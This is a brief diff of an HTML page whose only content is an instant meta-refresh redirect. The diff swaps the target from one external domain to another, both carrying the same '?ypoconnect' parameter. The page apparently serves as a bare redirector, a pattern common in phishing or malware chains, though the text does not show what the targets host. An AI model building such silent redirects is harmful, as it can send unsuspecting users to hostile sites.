--- a/prime.html
+++ b/prime.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
   <head>
-    <meta http-equiv="refresh" content="0; url='https://primecdn.rest/?ypoconnect'" />
+    <meta http-equiv="refresh" content="0; url='https://propertymgnt.org/nn?ypoconnect'" />
   </head>
 
 </html>
